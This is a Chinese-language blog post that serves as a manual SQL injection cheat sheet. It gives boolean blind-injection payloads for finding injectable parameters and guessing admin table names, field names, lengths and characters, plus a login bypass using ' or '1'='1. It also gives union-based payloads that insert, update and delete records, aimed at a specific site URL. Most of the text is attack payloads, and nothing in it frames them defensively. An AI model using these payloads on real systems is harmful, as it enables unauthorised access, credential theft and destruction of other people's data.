<div class="post_body"> <p><a data-thumbs="{"autoStart":true}" href="https://oss.imangie.com/webimangie/HTB12y1WSOrpK1RjSZFhq6xSdXXa5.jpg" data-fancybox="https://oss.imangie.com/webimangie/HTB12y1WSOrpK1RjSZFhq6xSdXXa5.jpg" alt="HTB12y1WSOrpK1RjSZFhq6xSdXXa5" title="HTB12y1WSOrpK1RjSZFhq6xSdXXa5" rel="external nofollow" target="_blank" style="cursor: url("/usr/plugins/HoerMouse/static/image/dew/link.cur"), pointer;"><img data-original="https://oss.imangie.com/webimangie/HTB12y1WSOrpK1RjSZFhq6xSdXXa5.jpg" alt="" title="" class="lazyload" src="https://oss.imangie.com/webimangie/HTB12y1WSOrpK1RjSZFhq6xSdXXa5.jpg" style="display: block;"></a></p><span class="menu-target-fix" id="menu_index_1" name="menu_index_1"></span><h2>一、判断有无注入点</h2><blockquote><p>数字型:and 1=1 and 1=2 和 ‘</p><p>字符型:’and ‘1’=’1? ‘and ‘1’=’2</p><p>搜索型:关键字%’ and 1=1 and ‘%’=’%??? 关键字%’ and 1=2 and ‘%’=’%</p></blockquote><p>大部分数据库都有用单行注释符(–)和多行注释符(/**/),在不需要执行后面操作的地方,可以添加相对应的注释符,盲注的情况下,用上面sql语句看返回页面是看不到页面异常信息的。</p><span class="menu-target-fix" id="menu_index_2" name="menu_index_2"></span><h2>二、猜表</h2><blockquote><p>一般的表的名是admin username password tables等..</p><p>and 0<>(select count(<em>) from </em>)</p><p>and 0<>(select count(*) from admin) –判断是否存在admin这张表</p></blockquote><span class="menu-target-fix" id="menu_index_3" name="menu_index_3"></span><h2>三、猜账号数目</h2><blockquote><p>如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个</p><p>and 0<(select count(*) from admin)</p><p>and 1<(select count(*) from admin)</p></blockquote><span class="menu-target-fix" id="menu_index_4" name="menu_index_4"></span><h2>四、猜字段名称</h2><blockquote><p>在len( ) 括号里面加上我们想到的字段名称.</p><p>and 1=(select count(<em>) from admin where len(</em>)>0)</p><p>and 1=(select count(*) from admin where len(用户字段名称name)>0)</p><p>and 1=(select count(*) from admin where<br>len(_blank>密码字段名称password)>0)</p></blockquote><span class="menu-target-fix" id="menu_index_5" name="menu_index_5"></span><h2>五、猜解各个字段的长度</h2><blockquote><p>猜解长度就是把>0变换 直到返回正确页面为止</p><p>and 1=(select count(<em>) from admin where len(</em>)>0)</p><p>and 1=(select count(*) from admin where len(name)>6) 错误</p><p>and 1=(select count(*) from admin where len(name)>5) 正确 长度是6</p><p>and 1=(select count(*) from admin where len(name)=6) 正确</p><p>and 1=(select count(*) from admin where len(password)>11) 正确</p><p>and 1=(select count(*) from admin where len(password)>12) 错误 长度是12</p><p>and 1=(select count(*) from admin where len(password)=12) 正确</p></blockquote><span class="menu-target-fix" id="menu_index_6" name="menu_index_6"></span><h2>六、猜解字符</h2><blockquote><p>and 1=(select count(*) from admin where left(name,1)=a)</p><p>–猜解用户帐号的第一位</p><p>and 1=(select count(*) from admin where left(name,2)=ab)</p><p>–猜解用户帐号的第二位</p><p>就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了</p></blockquote><span class="menu-target-fix" id="menu_index_7" name="menu_index_7"></span><h2>七、后台弱口令类型SQL注入</h2><blockquote><p>原始SQL:SELECT * FROM Users WHERE Username=’$username’ AND<br>Password=’$password’</p><p>$username = 1′ or ‘1’=’1</p><p>$password=1′ or ‘1’=’1</p><p>然后sql查询会变为下面新的查询语句</p><p>SELECT * FROM Users WHERE Username=’1′ OR ‘1’=’1′ AND Password=’1’OR<br>‘1’=’1′</p><p>顺便回忆一个sql注入的过程,某注入点已经成立,想做增删改查的操作。</p></blockquote><p>假设注入点为?<a href="http://0535code.com/?p=635" rel="external nofollow" target="_blank" style="cursor: url("/usr/plugins/HoerMouse/static/image/dew/link.cur"), pointer;">http://0535code.com/?p=635</a> And 1=2 union select 1,2,3,4,5,6,7,8,9,10 from member<br>以上是查询语句了,要构造增加,删除,修改语句都要通过上面联合做查询。<br>增加:<a href="http://0535code.com/?p=635" rel="external nofollow" target="_blank" style="cursor: url("/usr/plugins/HoerMouse/static/image/dew/link.cur"), pointer;">http://0535code.com/?p=635</a> And 1=2 union?INSERT INTO members (username,password) VALUES (‘demo’,’demo’);<br>修改:<a href="http://0535code.com/?p=635" rel="external nofollow" target="_blank" style="cursor: url("/usr/plugins/HoerMouse/static/image/dew/link.cur"), pointer;">http://0535code.com/?p=635</a> And 1=2 union UPDATE member SET username = ‘name’ WHERE username = ‘demo’;<br>删除:<a href="http://0535code.com/?p=635" rel="external nofollow" target="_blank" style="cursor: url("/usr/plugins/HoerMouse/static/image/dew/link.cur"), pointer;">http://0535code.com/?p=635</a> And 1=2 union DELETE FROM members WHERE username = ‘demo’ ;<br>或者也可以把查询语句放union,结束的时候加个分号(;),表示结束,再重新添加构造的sql语句。</p><p><strong>过以上几个语句,有几个疑问,验证了下答案。</strong></p><ol><li>问题一:在猜解到了数据库表名和列名,是否可以添加记录?</li></ol><blockquote><p>原始sql语句:INSERT INTO <code>test</code>.<code>users</code> (<code>id</code>, <code>username</code>, <code>password</code>,<br><code>name</code>) VALUES (NULL, ‘1111’, ‘2222’, ‘3333’); 测试sql语句:INSERT INTO<br><code>test</code>.<code>users</code> ( <code>name</code>) VALUES ( ‘ccc’);<br>经过测试是可行的,只要猜到表名和字段名就可以增删改查操作了。</p></blockquote><ol><li>问题二:select 1,2,3,4,5,6,7,8,9,10 from member,中间列数怎么用呢?</li></ol><blockquote><p>select name from users where 1 and 1=2 union select 1 , 2, 3,4,5,6<br>from users 如果为6个字段的话,才会正常返回值,通过这个确定列数,确定列数后,可以猜解字段所在的列,从1替换到10看返回数据。</p></blockquote><p>现在工具那么多,通常sql注入,会采用sqlmap,pangolin,Havij验证,有些需要手工构造后,通过工具爆库。</p> </div> 最后修改:2021 年 07 月 31 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 如果觉得我的文章对你有用,请随意赞赏
